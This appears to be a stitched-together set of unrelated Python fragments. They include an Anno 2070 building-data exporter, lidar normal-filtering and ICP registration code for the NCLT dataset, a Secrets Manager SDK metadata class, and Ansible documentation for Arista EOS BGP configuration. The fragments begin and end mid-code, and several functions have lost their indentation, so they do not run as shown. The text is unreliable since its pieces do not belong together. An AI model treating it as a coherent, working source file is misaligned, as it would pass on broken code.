    """Map IntermediateLevel ids to (ResidentCount, level tag) tuples.

    Reads the second SortedLevels element of properties.xml; each child's
    tag becomes the level name paired with the required resident count.
    """
    Unlocks = {}
    # list(p) replaces Element.getchildren(), which was removed in Python 3.9.
    for p in list(ET.parse(properties_path).findall(".//SortedLevels")[1]):
        for i in p.findall("levels/Item"):
            level_node = i.find("IntermediateLevel")
            count_node = i.find("ResidentCount")
            if level_node is None or count_node is None:
                # Item without the needed children - skip explicitly
                # instead of a bare except.
                continue
            try:
                Unlocks[level_node.text] = (int(count_node.text), p.tag)
            except (TypeError, ValueError):
                pass
    return Unlocks
#===============================================================================
def validate(buildings, model):
    """Check every building dict against the model's key/type declarations.

    Args:
        buildings: list of building property dicts.
        model: maps key name -> "type: description" where type is one of
            text, int, float, int(+/-), float(+/-).

    Returns:
        "ok" when everything matches, otherwise a report listing unknown
        keys (as ready-to-paste model entries) and type mismatches.
    """
    valid_keys = model.keys()
    result = set()
    for b in buildings:
        for k in b.keys():
            if k not in valid_keys:
                # The original 'break' stopped at the first unknown key
                # per building; 'continue' reports them all.
                result.add("\"{0}\": \"\",".format(k))
                continue
            t = model[k].split(":")[0]
            if t not in ("text", "int", "float", "int(+/-)", "float(+/-)"):
                result.add("unknown type <{0}> for key: {1}".format(t, k))
            elif (t == "text" and not isinstance(b[k], str)
                  or t.startswith("int") and not isinstance(b[k], int)
                  # The original compared t[:3] == "float", which can never
                  # be true, so float values were silently never checked.
                  or t.startswith("float") and not isinstance(b[k], float)):
                result.add("{0} should be <{1}> type, but for b[\"Name\"] = {2} the value is: {3}".format(k, t, b["Name"], b[k]))
    if result:
        text_result = "Invalid keys not found in model:\n\n"
        for r in result:
            text_result += r + "\n"
    else:
        text_result = "ok"
    return text_result
def out_json(buildings, model):
    """Dump the model and the building list as JSON files in `folder`.

    Writes folder+model_name (the model alone) and folder+output_name
    (version, model url and the buildings array).  Both handles were
    previously opened and never closed; 'with' guarantees flush/close.
    """
    with open(folder + model_name, "w") as model_file:
        json.dump(model,
                  fp=model_file,
                  indent=2,
                  sort_keys=True)
    with open(folder + output_name, "w") as out_file:
        json.dump({"_version": __version__,
                   "_model": model_url,
                   "buildings": buildings},
                  fp=out_file,
                  indent=2,
                  sort_keys=True)
    return None
def out_csv(objects, model, object_type):
    """Write a semicolon-separated CSV dump of `objects` for `object_type`.

    Columns are the sorted keys of model[object_type]; objects missing a
    key get an empty cell.  The output file name is derived from
    output_name by inserting the object type before the extension.
    """
    # Accumulate parts and join once: the original repeated string += was
    # quadratic in the number of objects.  Output bytes are unchanged.
    parts = ["This is a csv dump for anno data version {0}, see model {1} ...\n".format(__version__, model_url)]
    parts.append("To calculate with the data in spreadsheet formulas, try something like the following instead of fixed ranges (order of columns might change in future versions):\n")
    parts.append("\" =INDEX(data_range;MATCH($A2;OFFSET(data_first_column;0;MATCH('Eng1';data_headers;0)-1);0);MATCH(B$1;data_headers;0))\"\n\n")
    headers = sorted(model[object_type].keys())
    parts.extend("{0};".format(h) for h in headers)
    parts.append("\n")
    for obj in objects:
        # Missing keys become empty cells (dict.get replaces a bare except).
        parts.extend("{0};".format(obj.get(h, "")) for h in headers)
        parts.append("\n")
    csv = "".join(parts)
    with open(folder + output_name.replace(".json", "_{0}.csv".format(object_type)), "w") as f:
        f.write(csv)
    return None
#===============================================================================
def main():
model = {"_description": "this is a list of Anno 2070 buildings with properties that help fan-made tools in there .. i tried to name the properties somewhat close to actual xml elements in game data files .. you can contact me on http://anno2070.wikia.com/wiki/User:DeathApril or <EMAIL>",
"_version": __version__,
"_gameversion": "v1.02 (patch3.rda)",
"_missing_keys": "not all objects use all the keys in this model, please check for KeyError exceptions before working with them (e.g. Production.RawNeeded2Material will be missing for factories with 1 input only)",
"_changelog": {"0.3": ["2011-12-17",
"IconFileName changed, the second number corresponds to IconIndexdo without added +1 (for icons numbered from 0 instead from 1)",
"IconWikiaFile added",
"Production.Product.BaseGoldPrice added (in default trade price, not in datafile format)",
"FarmField.BuildBlocker.* added (for convenience)",
"BuildCost.* added",
"MaintananceCost.* added",
"Unlock.* added"
],
"0.2": ["2011-12-15",
"BuildBlocker array of 2 ints split to 2 properties *.x and *.z (so .csv dump of could be 1:1 to JSON)",
"ProductName, ProductGUID and ProductEng1 renamed to Production.Product.* (for naming consistency)",
"MaxResidentCount, Faction and Group added",
"FarmField.* added + the farmfields themselves can be found in the buildings array by GUID (for farm size)",
"Production.* added"
]
},
"buildings": {"GUID": "int: GUID as appears in assets.xml and other | |
np.meshgrid(coords, coords)
sq_r = x ** 2 + y ** 2
elif dimension == 3:
x, y, z = np.meshgrid(coords, coords, coords)
sq_r = x ** 2 + y ** 2 + z ** 2
elif dimension == 4:
x, y, z, t = np.meshgrid(coords, coords, coords, coords)
sq_r = x ** 2 + y ** 2 + z ** 2 + t ** 2
else:
raise ValueError('Unsupported dimension (max is 4)')
return torch.exp(-torch.from_numpy(sq_r.astype(np.float32)) / (2 * sig ** 2 + eps))
def normal_filtering(normals, debug=False):
    """Weight normals by how common their direction is.

    Bins the normals on a cartesian 3D voxel grid (instead of spherical
    coordinates, to avoid the pole resolution problem), smooths the bin
    counts with a gaussian 3D convolution, and keeps only the normals
    falling in the most populated bins (above the 80th percentile).

    :param normals: array of normal vectors, shape (N, 3) -- assumed to
        be unit vectors, TODO confirm with callers.
    :param debug: when True, dumps the smoothed histogram as a point
        cloud and aborts via a deliberate division by zero.
    :return: per-input-normal weight array of shape (N,), values 0.0 or 1.0.
    """
    # Discretise the sphere in cartesian coordinates to avoid the pole
    # resolution problem
    voxel_size = 0.05
    # Compute voxel index for each point
    grid_indices = (np.floor(normals / voxel_size)).astype(int)
    # Limits of the grid
    min_grid_indices = np.amin(grid_indices, axis=0)
    max_grid_indices = np.amax(grid_indices, axis=0)
    # Number of cells in each direction
    deltaX, deltaY, deltaZ = max_grid_indices - min_grid_indices + 1
    # Relocate indices so they start at zero
    grid_indices -= min_grid_indices
    # Scalar equivalent to grid indices (x + y*dx + z*dx*dy flattening)
    scalar_indices = grid_indices[:, 0] + grid_indices[:, 1] * deltaX + grid_indices[:, 2] * deltaX * deltaY
    # np.unique returns (values, inverse, counts) in this fixed order,
    # regardless of the keyword order in the call.
    unique_inds, inverse, counts = np.unique(scalar_indices, return_counts=True, return_inverse=True)
    # Get counts in a 3D matrix: unflatten the scalar indices back to x/y/z
    unique_z = unique_inds // (deltaX * deltaY)
    unique_inds -= unique_z * deltaX * deltaY
    unique_y = unique_inds // deltaX
    unique_x = unique_inds - unique_y * deltaX
    count_matrix = np.zeros((deltaX, deltaY, deltaZ), dtype=np.float32)
    count_matrix[unique_x, unique_y, unique_z] += counts
    # Smooth them with a gaussian filter convolution (fixed kernel, no grad)
    torch_conv = torch.nn.Conv3d(1, 1, kernel_size=5, stride=1, bias=False)
    torch_conv.weight.requires_grad_(False)
    torch_conv.weight *= 0
    torch_conv.weight += gaussian_conv_filter(3, 5)
    # Normalise the kernel so its weights sum to 1
    torch_conv.weight *= torch.sum(torch_conv.weight) ** -1
    # Add the batch and channel dimensions Conv3d expects
    count_matrix = np.expand_dims(count_matrix, 0)
    count_matrix = np.expand_dims(count_matrix, 0)
    torch_count = torch.from_numpy(count_matrix)
    # Pad by 2 on every side so the 5x5x5 convolution preserves grid size
    torch_count = torch.nn.functional.pad(torch_count, [2, 2, 2, 2, 2, 2])
    smooth_counts = torch.squeeze(torch_conv(torch_count))
    # Read back the smoothed count of each occupied voxel only
    smooth_counts = smooth_counts.numpy()[unique_x, unique_y, unique_z]
    #################################################
    # Create weight according to the normal direction
    #################################################
    # Only 20% of the normals bins are kept For the rest, we use weights based on ditances
    weights = (smooth_counts > np.percentile(smooth_counts, 80)).astype(np.float32)
    # Show histogram in a spherical point cloud
    if debug:
        n_cloud = np.vstack((unique_x, unique_y, unique_z)).astype(np.float32).T
        # Voxel centers back in normal-space coordinates
        n_cloud = (n_cloud + min_grid_indices.astype(np.float32) + 0.5) * voxel_size
        #n_cloud = n_cloud / np.linalg.norm(n_cloud, axis=1, keepdims=True)
        write_ply('nnn_NORMAL_HIST.ply',
                  [n_cloud, smooth_counts],
                  ['x', 'y', 'z', 'counts'])
        # Deliberate crash to stop execution after dumping the debug cloud
        a = 1/0
    # Map per-voxel weights back to per-normal weights
    return weights[inverse]
def load_gt_poses(gt_path, only_day_1=False):
    """Load ground-truth trajectories (timestamps + 4x4 poses) per day.

    Each day's csv is parsed once and cached as a .pkl file next to it;
    later calls read the pickle directly.

    :param gt_path: folder containing one ground-truth csv per day.
    :param only_day_1: when True, stop after the first day.
    :return: (gt_t, gt_H) - two lists with one entry per day.
    """
    csv_names = np.sort([name for name in listdir(gt_path) if name[-4:] == '.csv'])
    all_times = []
    all_poses = []
    for day_idx, csv_name in enumerate(csv_names):
        tic = time.time()
        cache_file = join(gt_path, csv_name[:-4] + '.pkl')
        if exists(cache_file):
            # Cached: read timestamps and poses back from the pickle.
            with open(cache_file, 'rb') as pkl:
                day_times, day_poses = pickle.load(pkl)
        else:
            # First run: parse the csv, convert each SSC pose row into a
            # homogeneous 4x4 matrix, then cache the result.
            raw = np.loadtxt(join(gt_path, csv_name), delimiter=',')
            day_times = raw[:, 0]
            day_poses = ssc_to_homo(raw[:, 1:])
            with open(cache_file, 'wb') as pkl:
                pickle.dump([day_times, day_poses], pkl)
        toc = time.time()
        print('{:s} {:d}/{:d} Done in {:.1f}s'.format(csv_name, day_idx, csv_names.shape[0], toc - tic))
        all_times.append(day_times)
        all_poses.append(day_poses)
        if only_day_1 and day_idx > -1:
            break
    return all_times, all_poses
def get_area_frames(days, gt_t, gt_H, raw_path, area_center, area_radius, only_day_1=False):
    """For each day, keep the lidar frame timestamps recorded inside an area.

    A frame is kept when its ground-truth position lies within
    `area_radius` of `area_center`.  The kept timestamps are then trimmed
    to the single contiguous pass containing the frame closest to the
    area center: gaps larger than 5x the median frame period delimit
    separate passes.

    :param days: list of day folder names under `raw_path`.
    :param gt_t: per-day ground-truth timestamp arrays.
    :param gt_H: per-day ground-truth 4x4 pose arrays.
    :param raw_path: folder with one sub-folder of .ply frames per day,
        each frame file named by its timestamp.
    :param area_center: 3D point of interest (same frame/units as poses).
    :param area_radius: selection radius around `area_center`.
    :param only_day_1: when True, stop after the first day.
    :return: list (one entry per day) of float64 timestamp arrays.
    """
    # Loop on days
    day_f_times = []
    for d, day in enumerate(days):
        # Get frame timestamps (file names are timestamps with .ply suffix)
        frames_folder = join(raw_path, day)
        f_times = np.sort([float(f[:-4]) for f in listdir(frames_folder) if f[-4:] == '.ply'])
        # Ground truth does not cover all frames
        day_min_t = gt_t[d][0]
        day_max_t = gt_t[d][-1]
        f_t_bool = np.logical_and(f_times > day_min_t, f_times < day_max_t)
        f_times = f_times[f_t_bool]
        # Interpolation gt poses to frame timestamps (nearest pose, no blending)
        interp = scipy.interpolate.interp1d(gt_t[d], gt_H[d], kind='nearest', axis=0)
        frame_poses = interp(f_times)
        # Closest frame to picked point
        closest_i = 0
        closest_d = 1e6
        new_f_times = []
        for f_i, f_t in enumerate(f_times):
            # GT pose
            H = frame_poses[f_i].astype(np.float32)
            # Focus check: distance of the pose translation to the area center
            f_dist = np.linalg.norm(H[:3, 3] - area_center)
            if f_dist > area_radius:
                continue
            # Save closest frame (index into the filtered candidate list)
            if (f_dist < closest_d):
                closest_d = f_dist
                closest_i = len(new_f_times)
            # Append frame to candidates
            new_f_times.append(f_t)
        # Filter to only get subsequent frames
        # NOTE(review): assumes at least two candidates fall inside the
        # area; an empty list makes np.median warn / return nan -- confirm
        # callers guarantee this.
        new_f_times = np.array(new_f_times, dtype=np.float64)
        gaps = new_f_times[1:] - new_f_times[:-1]
        med_gap = np.median(gaps[:50])
        jumps = np.sort(np.where(gaps > 5 * med_gap)[0])
        # Keep only the contiguous segment [i0, i1) around the closest frame
        i0 = 0
        i1 = len(new_f_times)
        for j in jumps:
            if j + 1 < closest_i:
                i0 = j + 1
        for j in jumps[::-1]:
            if j + 1 > closest_i:
                i1 = j + 1
        day_f_times.append(new_f_times[i0:i1])
        if only_day_1 and d > -1:
            break
    return day_f_times
def test_icp_registration():
"""
Test ICP registration Use GT to extract a small interesting region.
"""
############
# Parameters
############
# In files
data_path = '../../Data/NCLT'
gt_folder = 'ground_truth'
cov_folder = 'ground_truth_cov'
# Transformation from body to velodyne frame (from NCLT paper)
x_body_velo = np.array([0.002, -0.004, -0.957, 0.807, 0.166, -90.703])
H_body_velo = ssc_to_homo(x_body_velo, ssc_in_radians=False)
H_velo_body = np.linalg.inv(H_body_velo)
x_body_lb3 = np.array([0.035, 0.002, -1.23, -179.93, -0.23, 0.50])
H_body_lb3 = ssc_to_homo(x_body_lb3, ssc_in_radians=False)
H_lb3_body = np.linalg.inv(H_body_lb3)
# Out files
out_folder = join(data_path, 'day_ply')
if not exists(out_folder):
makedirs(out_folder)
# Get gt files and days
gt_files = np.sort([gt_f for gt_f in listdir(join(data_path, gt_folder)) if gt_f[-4:] == '.csv'])
cov_files = np.sort([cov_f for cov_f in listdir(join(data_path, cov_folder)) if cov_f[-4:] == '.csv'])
days = [d[:-4].split('_')[1] for d in gt_files]
###############
# Load GT poses
###############
print('\nLoading days groundtruth poses...')
t0 = time.time()
gt_H = []
gt_t = []
for d, gt_f in enumerate(gt_files):
t1 = time.time()
gt_pkl_file = join(data_path, gt_folder, gt_f[:-4] + '.pkl')
if exists(gt_pkl_file):
# Read pkl
with open(gt_pkl_file, 'rb') as f:
day_gt_t, day_gt_H = pickle.load(f)
else:
# File paths
gt_csv = join(data_path, gt_folder, gt_f)
# Load gt
gt = np.loadtxt(gt_csv, delimiter=',')
# Convert gt to homogenous rotation/translation matrix
day_gt_t = gt[:, 0]
day_gt_H = ssc_to_homo(gt[:, 1:])
# Save pickle
with open(gt_pkl_file, 'wb') as f:
pickle.dump([day_gt_t, day_gt_H], f)
t2 = time.time()
print('{:s} {:d}/{:d} Done in {:.1f}s'.format(gt_f, d, gt_files.shape[0], t2 - t1))
gt_t += [day_gt_t]
gt_H += [day_gt_H]
if d > -1:
break
t2 = time.time()
print('Done in {:.1f}s\n'.format(t2 - t0))
########################
# Get lidar frames times
########################
# Focus on a particular point
p0 = np.array([-220, -527, 12])
center_radius = 10.0
point_radius = 50.0
print('\nGet timestamps in focused area...')
t0 = time.time()
# Loop on days
day_f_times = []
for d, day in enumerate(days):
day_min_t = gt_t[d][0]
day_max_t = gt_t[d][-1]
frames_folder = join(data_path, 'raw_ply', day)
f_times = np.sort([float(f[:-4]) for f in listdir(frames_folder) if f[-4:] == '.ply'])
# Is this frame in gt
f_t_bool = np.logical_and(f_times > day_min_t, f_times < day_max_t)
f_times = f_times[f_t_bool]
# Interpolation gt poses to frame timestamps
interp = scipy.interpolate.interp1d(gt_t[d], gt_H[d], kind='nearest', axis=0)
frame_poses = interp(f_times)
N = len(f_times)
new_f_times = []
for f_i, f_t in enumerate(f_times):
t1 = time.time()
# GT pose
H = frame_poses[f_i].astype(np.float32)
# Focus check
if np.linalg.norm(H[:3, 3] - p0) > center_radius:
continue
new_f_times.append(f_t)
# DEBUGGGGGG
new_f_times = new_f_times[5:-5]
day_f_times.append(np.array(new_f_times, dtype=np.float64))
if d > -1:
break
t2 = time.time()
print('Done in {:.1f}s\n'.format(t2 - t0))
###########################
# coarse map with pt2pt icp
###########################
for d, day in enumerate(days):
frames_folder = join(data_path, 'raw_ply', day)
N = len(day_f_times[d])
print('Reading', day, ' => ', N, 'files')
# Load first frame as map
last_transform = np.eye(4)
last_cloud = None
threshold = 0.3
score_thresh = 0.99
voxel_size = 0.1
transform_list = []
cloud_list = []
cloud_map = None
full_map = None
full_map_t = None
verbose = 1
t = [time.time()]
for f_i, f_t in enumerate(day_f_times[d]):
#######################
# Load velo point cloud
#######################
t = [time.time()]
# Load frame ply file
f_name = '{:.0f}.ply'.format(f_t)
cloud = o3d.io.read_point_cloud(join(frames_folder, f_name))
t += [time.time()]
# Cloud normals and planarity
scores = estimate_normals_planarity(cloud)
if f_i < 1:
last_cloud = cloud
cloud_map = cloud
continue
t += [time.time()]
# Remove low score for fitting
cloud_down = o3d.geometry.PointCloud()
cloud_down.points = o3d.utility.Vector3dVector(np.asarray(cloud.points)[scores > score_thresh, :])
cloud_down.normals = o3d.utility.Vector3dVector(np.asarray(cloud.normals)[scores > score_thresh, :])
# Downsample target
cloud_down = cloud_down.voxel_down_sample(voxel_size)
# if f_i > 2:
#
# np.asarray(last_cloud.normals).astype(np.float32)
# new_scores = np.ones_like(np.asarray(cloud_down.points).astype(np.float32))[:, 0]
# H, rms = pt2pl_icp(np.asarray(cloud_down.points).astype(np.float32),
# np.asarray(last_cloud.points).astype(np.float32),
# np.asarray(last_cloud.normals).astype(np.float32),
# new_scores,
# n_samples=1000,
# max_pairing_dist=0.2,
# max_iter=10,
# minDiffRMS=0.001)
#
# print(H)
# print(rms)
# a = 1 / 0
t += [time.time()]
# Measure initial ICP metrics
if verbose == 2:
reg_init = o3d.registration.evaluate_registration(cloud_down, last_cloud,
| |
secret
state.
:attr str secret_type: (optional) The secret type.
:attr str crn: (optional) The Cloud Resource Name (CRN) that uniquely identifies
the resource.
:attr datetime creation_date: (optional) The date the secret was created. The
date format follows RFC 3339.
:attr str created_by: (optional) The unique identifier for the entity that
created the secret.
:attr datetime last_update_date: (optional) Updates when any part of the secret
metadata is modified. The date format follows RFC 3339.
:attr int versions_total: (optional) The number of versions the secret has.
:attr datetime expiration_date: (optional) The date the secret material expires.
The date format follows RFC 3339.
You can set an expiration date on supported secret types at their creation. If
you create a secret without specifying an expiration date, the secret does not
expire. The `expiration_date` field is supported for the following secret types:
- `arbitrary`
- `username_password`.
"""
def __init__(self,
             name: str,
             *,
             id: str = None,
             labels: List[str] = None,
             description: str = None,
             secret_group_id: str = None,
             state: int = None,
             state_description: str = None,
             secret_type: str = None,
             crn: str = None,
             creation_date: datetime = None,
             created_by: str = None,
             last_update_date: datetime = None,
             versions_total: int = None,
             expiration_date: datetime = None) -> None:
    """
    Initialize a ArbitrarySecretMetadata object.

    :param str name: A human-readable alias for the secret.  Avoid
           personal data (name, location, ...) in aliases.
    :param List[str] labels: (optional) Labels used to filter secrets in
           your instance.  Up to 30 labels of 2-30 characters each,
           spaces allowed; angled brackets, commas, colons, ampersands
           and vertical pipe characters (|) are not permitted.  Avoid
           personal data in labels.
    :param str description: (optional) An extended description of the
           secret.  Avoid personal data in descriptions.
    :param datetime expiration_date: (optional) The date the secret
           material expires (RFC 3339).  Secrets created without one
           never expire; only supported for the `arbitrary` and
           `username_password` secret types.

    The remaining keyword arguments are stored unchanged as the
    attributes of the same name.
    """
    # pylint: disable=super-init-not-called
    # Attributes are assigned in signature order.
    self.name = name
    self.id = id
    self.labels = labels
    self.description = description
    self.secret_group_id = secret_group_id
    self.state = state
    self.state_description = state_description
    self.secret_type = secret_type
    self.crn = crn
    self.creation_date = creation_date
    self.created_by = created_by
    self.last_update_date = last_update_date
    self.versions_total = versions_total
    self.expiration_date = expiration_date
@classmethod
def from_dict(cls, _dict: Dict) -> 'ArbitrarySecretMetadata':
    """Initialize a ArbitrarySecretMetadata object from a json dictionary."""
    if 'name' not in _dict:
        raise ValueError('Required property \'name\' not present in ArbitrarySecretMetadata JSON')
    args = {}
    # Plain fields are copied verbatim from the JSON payload.
    for key in ('id', 'labels', 'name', 'description', 'secret_group_id',
                'state', 'state_description', 'secret_type', 'crn',
                'created_by', 'versions_total'):
        if key in _dict:
            args[key] = _dict.get(key)
    # Timestamp fields arrive as RFC 3339 strings and are parsed to datetime.
    for key in ('creation_date', 'last_update_date', 'expiration_date'):
        if key in _dict:
            args[key] = string_to_datetime(_dict.get(key))
    return cls(**args)
@classmethod
def _from_dict(cls, _dict):
    """Initialize a ArbitrarySecretMetadata object from a json dictionary.

    Internal alias; delegates to from_dict().
    """
    return cls.from_dict(_dict)
def to_dict(self) -> Dict:
    """Return a json dictionary representing this model.

    Attributes that are absent or None are omitted; datetime attributes
    are rendered as RFC 3339 strings.
    """
    serialized = {}
    # (attribute name, True when the value is a datetime that must be
    # converted to a string); order mirrors the original serialization.
    field_specs = (
        ('id', False),
        ('labels', False),
        ('name', False),
        ('description', False),
        ('secret_group_id', False),
        ('state', False),
        ('state_description', False),
        ('secret_type', False),
        ('crn', False),
        ('creation_date', True),
        ('created_by', False),
        ('last_update_date', True),
        ('versions_total', False),
        ('expiration_date', True),
    )
    for field, is_datetime in field_specs:
        if not hasattr(self, field):
            continue
        value = getattr(self, field)
        if value is None:
            continue
        serialized[field] = datetime_to_string(value) if is_datetime else value
    return serialized
def _to_dict(self):
    """Return a json dictionary representing this model.

    Internal alias; delegates to to_dict().
    """
    return self.to_dict()
def __str__(self) -> str:
    """Return a `str` version of this ArbitrarySecretMetadata object."""
    # Pretty-printed JSON built from the serialized form.
    as_dict = self.to_dict()
    return json.dumps(as_dict, indent=2)
def __eq__(self, other: 'ArbitrarySecretMetadata') -> bool:
    """Return `true` when self and other are equal, false otherwise."""
    # Same class and identical attribute dictionaries.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other: 'ArbitrarySecretMetadata') -> bool:
    """Return `true` when self and other are not equal, false otherwise."""
    # Delegates to __eq__ via the == operator and negates the result.
    return not self == other
class SecretTypeEnum(str, Enum):
    """
    The secret type.
    """
    ARBITRARY = 'arbitrary'
    # Restored from the redaction placeholder '<PASSWORD>': the Secrets
    # Manager API identifies this secret type as 'username_password'.
    USERNAME_PASSWORD = 'username_password'
    IAM_CREDENTIALS = 'iam_credentials'
    IMPORTED_CERT = 'imported_cert'
    PUBLIC_CERT = 'public_cert'
class ArbitrarySecretResource(SecretResource):
"""
Properties that describe a secret.
:attr str id: (optional) The v4 UUID that uniquely identifies the secret.
:attr str name: A human-readable alias to assign to your secret.
To protect your privacy, do not use personal data, such as your name or
location, as an alias for your secret.
:attr str description: (optional) An extended description of your secret.
To protect your privacy, do not use personal data, such as your name or
location, as a description for your secret.
:attr str secret_group_id: (optional) The v4 UUID that uniquely identifies the
secret group to assign to this secret.
If you omit this parameter, your secret is assigned to the `default` secret
group.
:attr List[str] labels: (optional) Labels that you can use to filter for secrets
in your instance.
Up to 30 labels can be created. Labels can be between 2-30 characters, including
spaces. Special characters not permitted include the angled bracket, comma,
colon, ampersand, and vertical pipe character (|).
To protect your privacy, do not use personal data, such as your name or
location, as a label for your secret.
:attr int state: (optional) The secret state based on NIST SP 800-57. States are
integers and correspond to the Pre-activation = 0, Active = 1, Suspended = 2,
Deactivated = 3, and Destroyed = 5 values.
:attr str state_description: (optional) A text representation of the secret
state.
:attr str secret_type: (optional) The secret type.
:attr str crn: (optional) The Cloud Resource Name (CRN) that uniquely identifies
your Secrets Manager resource.
:attr datetime creation_date: (optional) The date the secret was created. The
date format follows RFC 3339.
:attr str created_by: (optional) The unique identifier for the entity that
created the secret.
:attr datetime last_update_date: (optional) Updates when the actual secret is
modified. The date format follows RFC 3339.
:attr int versions_total: (optional) The number of versions that are associated
with a secret.
:attr List[dict] versions: (optional) An array that contains metadata for each
secret version. For more information on the metadata properties, see [Get secret
version metadata](#get-secret-version-metadata).
:attr datetime expiration_date: (optional) The date the secret material expires.
The date format follows RFC 3339.
You can set an expiration date on supported secret types at their creation. If
you create a secret without specifying an expiration date, the secret does not
expire. The `expiration_date` field is supported for the following secret types:
- `arbitrary`
- `username_password`.
:attr str payload: (optional) The new secret data to assign to the secret.
| |
Target.
type: str
router_id:
description: Router id.
type: str
shutdown:
description: When True, shut down BGP.
type: bool
timers:
description: Timers.
type: dict
suboptions:
keepalive:
description: Keep Alive Interval in secs.
type: int
holdtime:
description: Hold time in secs.
type: int
ucmp:
description: Configure unequal cost multipathing.
type: dict
suboptions:
fec:
description: Configure UCMP fec utilization threshold.
type: dict
suboptions:
trigger:
description: UCMP fec utilization too high threshold.
type: int
clear:
description: UCMP FEC utilization Clear thresholds.
type: int
link_bandwidth:
description: Configure link-bandwidth propagation delay.
type: dict
suboptions:
mode:
description: UCMP link bandwidth mode.
type: str
choices: ['encoding_weighted', 'recursive']
update_delay:
description: Link Bandwidth Advertisement delay.
type: int
mode:
description: UCMP mode.
type: dict
suboptions:
set:
description: If True, ucmp mode is set to 1.
type: bool
nexthops:
description: Value for total number UCMP nexthops.
type: int
update:
description: Configure BGP update generation.
type: dict
suboptions:
wait_for:
description: wait for options before converge or synchronize.
type: str
choices: ['wait_for_convergence', 'wait_install']
batch_size:
description: batch size for FIB route acknowledgements.
type: int
running_config:
description:
- This option is used only with state I(parsed).
- The value of this option should be the output received from the EOS device by
executing the command B(show running-config | section bgp).
- The state I(parsed) reads the configuration from C(running_config) option and
transforms it into Ansible structured data as per the resource module's argspec
and the value is then returned in the I(parsed) key within the result.
type: str
state:
description:
- The state the configuration should be left in.
- State I(purged) removes all the BGP configurations from the
target device. Use caution with this state.('no router bgp <x>')
- State I(deleted) only removes BGP attributes that this modules
manages and does not negate the BGP process completely. Thereby, preserving
address-family related configurations under BGP context.
- Running states I(deleted) and I(replaced) will result in an error if there
are address-family configuration lines present under vrf context that
is to be removed. Please use the M(arista.eos.eos_bgp_address_family)
module for prior cleanup.
- Refer to examples for more details.
type: str
choices: [deleted, merged, purged, replaced, gathered, rendered, parsed]
default: merged
"""
EXAMPLES = """
# Using merged
# Before state
# veos(config)#show running-config | section bgp
# veos(config)#
- name: Merge provided configuration with device configuration
arista.eos.eos_bgp_global:
config:
as_number: "100"
bgp_params:
host_routes: True
convergence:
slow_peer: True
time: 6
additional_paths: "send"
log_neighbor_changes: True
maximum_paths:
max_equal_cost_paths: 55
aggregate_address:
- address: "1.2.1.0/24"
as_set: true
match_map: "match01"
- address: "5.2.1.0/24"
attribute_map: "attrmatch01"
advertise_only: true
redistribute:
- protocol: "static"
route_map: "map_static"
- protocol: "attached-host"
distance:
internal: 50
neighbor:
- peer: "10.1.3.2"
allowas_in:
set: true
default_originate:
always: true
dont_capability_negotiate: true
export_localpref: 4000
maximum_received_routes:
count: 500
warning_limit:
limit_percent: 5
next_hop_unchanged: true
prefix_list:
name: "prefix01"
direction: "out"
- peer: "peer1"
fall_over: true
link_bandwidth:
update_delay: 5
monitoring: True
send_community:
community_attribute: "extended"
sub_attribute: "link-bandwidth"
link_bandwidth_attribute: "aggregate"
speed: "600"
vlan: 5
state: merged
# After State:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# distance bgp 50 50 50
# maximum-paths 55
# bgp additional-paths send any
# neighbor peer1 peer-group
# neighbor peer1 link-bandwidth update-delay 5
# neighbor peer1 fall-over bfd
# neighbor peer1 monitoring
# neighbor peer1 send-community extended link-bandwidth aggregate 600
# neighbor peer1 maximum-routes 12000
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# vlan 5
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# veos(config)#
#
# Module Execution:
#
# "after": {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "fall_over": true,
# "link_bandwidth": {
# "set": true,
# "update_delay": 5
# },
# "maximum_received_routes": {
# "count": 12000
# },
# "monitoring": true,
# "peer": "peer1",
# "peer_group": "peer1",
# "send_community": {
# "community_attribute": "extended",
# "link_bandwidth_attribute": "aggregate",
# "speed": "600",
# "sub_attribute": "link-bandwidth"
# }
# },
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "export_localpref": 4000,
# "maximum_received_routes": {
# "count": 500,
# "warning_limit": {
# "limit_percent": 5
# }
# },
# "next_hop_unchanged": true,
# "peer": "10.1.3.2"
# }
# ],
# "redistribute": [
# {
# "protocol": "static",
# "route_map": "map_static"
# },
# {
# "protocol": "attached-host"
# }
# ],
# "vlan": 5
# },
# "before": {},
# "changed": true,
# "commands": [
# "router bgp 100",
# "neighbor 10.1.3.2 allowas-in",
# "neighbor 10.1.3.2 default-originate always",
# "neighbor 10.1.3.2 dont-capability-negotiate",
# "neighbor 10.1.3.2 export-localpref 4000",
# "neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent",
# "neighbor 10.1.3.2 next-hop-unchanged",
# "neighbor 10.1.3.2 prefix-list prefix01 out",
# "neighbor peer1 fall-over bfd",
# "neighbor peer1 link-bandwidth update-delay 5",
# "neighbor peer1 monitoring",
# "neighbor peer1 send-community extended link-bandwidth aggregate 600",
# "redistribute static route-map map_static",
# "redistribute attached-host",
# "aggregate-address 1.2.1.0/24 as-set match-map match01",
# "aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only",
# "bgp host-routes fib direct-install",
# "bgp convergence slow-peer time 6",
# "bgp additional-paths send any",
# "bgp log-neighbor-changes",
# "maximum-paths 55",
# "distance bgp 50",
# "vlan 5"
# ],
# Using replaced:
# Before state:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
